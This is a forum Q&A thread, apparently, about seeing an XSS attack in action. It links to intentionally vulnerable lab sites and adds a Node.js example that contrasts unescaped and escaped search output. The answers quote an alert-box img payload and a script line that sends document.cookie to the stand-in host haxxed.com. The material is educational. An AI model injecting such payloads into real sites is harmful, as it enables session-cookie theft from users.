Can someone show me a Cross-site scripting attack in effect on my browser? Is there an example on the internet that does this? I haven't found this on the internet.
The simpler the example is the better.
See http://www.insecurelabs.org and http://www.insecurelabs.org/task/
Intentionally vulnerable to XSS in the search field and several other places.
<img src="javascript:alert('hello everybody')"></img>
The image tag that I inserted is an example of XSS. The above src contains the JavaScript alerting you.
You'll generally have to install your own server-side software for a live XSS example. Not many legitimate sites will open an XSS flaw intentionally to web surfers.
One ready-made piece of server-side software that lets you demonstrate XSS (among many other things) to yourself is OWASP's WebGoat. Here are instructions to install WebGoat and demonstrate XSS. You will find additional examples of program snippets that enable XSS in the OWASP article "Cross-site scripting (XSS)".
A simple form would also be: if the message box shows up, you know that the page or the server is vulnerable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
A great sample of how the technique works can be found here https://www.hacksplaining.com/exercises/xss-stored
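What the "vulnerable search field" in the answers above looks like on the server side, next to the escaped version, as an added example that is not part of any answer or of the sites they link to. The function names are hypothetical, the sample inputs are constructed (the first is the image tag quoted above), and it runs under Node.js without a browser.

```javascript
// Added example: a search page that echoes the query back into its HTML.
// All function names here are hypothetical, chosen for illustration.

// Vulnerable: the query is concatenated into the page as-is, both inside
// a quoted attribute and inside element text.
function renderSearchVulnerable(query) {
  return '<form><input name="q" value="' + query + '"></form>' +
         '<p>Results for: ' + query + '</p>';
}

// Characters that are significant in HTML text or in a quoted attribute.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: the same page, with the query escaped before it is echoed.
function renderSearchEscaped(query) {
  const safe = escapeHtml(query);
  return '<form><input name="q" value="' + safe + '"></form>' +
         '<p>Results for: ' + safe + '</p>';
}

// Crude check: did markup supplied in the query reach the page unchanged?
function reflectsMarkup(html, query) {
  return /[<>"']/.test(query) && html.includes(query);
}

// Constructed sample inputs: the image tag from this page and a plain query.
const SAMPLES = [
  `<img src="javascript:alert('hello everybody')"></img>`,
  'tom & jerry',
];

function demo() {
  return SAMPLES.map((q) => ({
    query: q,
    vulnerableReflects: reflectsMarkup(renderSearchVulnerable(q), q),
    escapedReflects: reflectsMarkup(renderSearchEscaped(q), q),
  }));
}

for (const row of demo()) console.log(row);
```

Escaping the quote characters matters here because the query is also echoed inside the `value="..."` attribute, where an unescaped `"` ends the attribute early.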